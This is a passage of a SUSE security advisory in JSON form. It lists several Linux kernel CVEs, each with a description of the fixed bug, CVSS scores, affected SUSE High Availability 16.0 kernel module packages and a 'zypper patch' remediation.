"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-39927",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39927"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix race condition validating r_parent before applying state\n\nAdd validation to ensure the cached parent directory inode matches the\ndirectory info in MDS replies. This prevents client-side race conditions\nwhere concurrent operations (e.g. rename) cause r_parent to become stale\nbetween request initiation and reply processing, which could lead to\napplying state changes to incorrect directory inodes.\n\n[ idryomov: folded a kerneldoc fixup and a follow-up fix from Alex to\n move CEPH_CAP_PIN reference when r_parent is updated:\n\n When the parent directory lock is not held, req-\u003er_parent can become\n stale and is updated to point to the correct inode. However, the\n associated CEPH_CAP_PIN reference was not being adjusted. The\n CEPH_CAP_PIN is a reference on an inode that is tracked for\n accounting purposes. Moving this pin is important to keep the\n accounting balanced. When the pin was not moved from the old parent\n to the new one, it created two problems: The reference on the old,\n stale parent was never released, causing a reference leak.\n A reference for the new parent was never acquired, creating the risk\n of a reference underflow later in ceph_mdsc_release_request(). This\n patch corrects the logic by releasing the pin from the old parent and\n acquiring it for the new parent when r_parent is switched. This\n ensures reference accounting stays balanced. ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39927",
"url": "https://www.suse.com/security/cve/CVE-2025-39927"
},
{
"category": "external",
"summary": "SUSE Bug 1250738 for CVE-2025-39927",
"url": "https://bugzilla.suse.com/1250738"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39927"
},
{
"cve": "CVE-2025-40030",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40030"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: check the return value of pinmux_ops::get_function_name()\n\nWhile the API contract in docs doesn\u0027t specify it explicitly, the\ngeneric implementation of the get_function_name() callback from struct\npinmux_ops - pinmux_generic_get_function_name() - can fail and return\nNULL. This is already checked in pinmux_check_ops() so add a similar\ncheck in pinmux_func_name_to_selector() instead of passing the returned\npointer right down to strcmp() where the NULL can get dereferenced. This\nis normal operation when adding new pinfunctions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40030",
"url": "https://www.suse.com/security/cve/CVE-2025-40030"
},
{
"category": "external",
"summary": "SUSE Bug 1252773 for CVE-2025-40030",
"url": "https://bugzilla.suse.com/1252773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40030"
},
{
"cve": "CVE-2025-40045",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40045"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd937x: set the comp soundwire port correctly\n\nFor some reason we endup with setting soundwire port for\nHPHL_COMP and HPHR_COMP as zero, this can potentially result\nin a memory corruption due to accessing and setting -1 th element of\nport_map array.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40045",
"url": "https://www.suse.com/security/cve/CVE-2025-40045"
},
{
"category": "external",
"summary": "SUSE Bug 1252784 for CVE-2025-40045",
"url": "https://bugzilla.suse.com/1252784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40045"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-throttle: fix access race during throttle policy activation\n\nOn repeated cold boots we occasionally hit a NULL pointer crash in\nblk_should_throtl() when throttling is consulted before the throttle\npolicy is fully enabled for the queue. Checking only q-\u003etd != NULL is\ninsufficient during early initialization, so blkg_to_pd() for the\nthrottle policy can still return NULL and blkg_to_tg() becomes NULL,\nwhich later gets dereferenced.\n\n Unable to handle kernel NULL pointer dereference\n at virtual address 0000000000000156\n ...\n pc : submit_bio_noacct+0x14c/0x4c8\n lr : submit_bio_noacct+0x48/0x4c8\n sp : ffff800087f0b690\n x29: ffff800087f0b690 x28: 0000000000005f90 x27: ffff00068af393c0\n x26: 0000000000080000 x25: 000000000002fbc0 x24: ffff000684ddcc70\n x23: 0000000000000000 x22: 0000000000000000 x21: 0000000000000000\n x20: 0000000000080000 x19: ffff000684ddcd08 x18: ffffffffffffffff\n x17: 0000000000000000 x16: ffff80008132a550 x15: 0000ffff98020fff\n x14: 0000000000000000 x13: 1fffe000d11d7021 x12: ffff000688eb810c\n x11: ffff00077ec4bb80 x10: ffff000688dcb720 x9 : ffff80008068ef60\n x8 : 00000a6fb8a86e85 x7 : 000000000000111e x6 : 0000000000000002\n x5 : 0000000000000246 x4 : 0000000000015cff x3 : 0000000000394500\n x2 : ffff000682e35e40 x1 : 0000000000364940 x0 : 000000000000001a\n Call trace:\n submit_bio_noacct+0x14c/0x4c8\n verity_map+0x178/0x2c8\n __map_bio+0x228/0x250\n dm_submit_bio+0x1c4/0x678\n __submit_bio+0x170/0x230\n submit_bio_noacct_nocheck+0x16c/0x388\n submit_bio_noacct+0x16c/0x4c8\n submit_bio+0xb4/0x210\n f2fs_submit_read_bio+0x4c/0xf0\n f2fs_mpage_readpages+0x3b0/0x5f0\n f2fs_readahead+0x90/0xe8\n\nTighten blk_throtl_activated() to also require that the throttle policy\nbit is set on the queue:\n\n return q-\u003etd != NULL \u0026\u0026\n test_bit(blkcg_policy_throtl.plid, q-\u003eblkcg_pols);\n\nThis prevents blk_should_throtl() from accessing throttle group state\nuntil policy data has been attached to blkgs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40147",
"url": "https://www.suse.com/security/cve/CVE-2025-40147"
},
{
"category": "external",
"summary": "SUSE Bug 1253344 for CVE-2025-40147",
"url": "https://bugzilla.suse.com/1253344"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
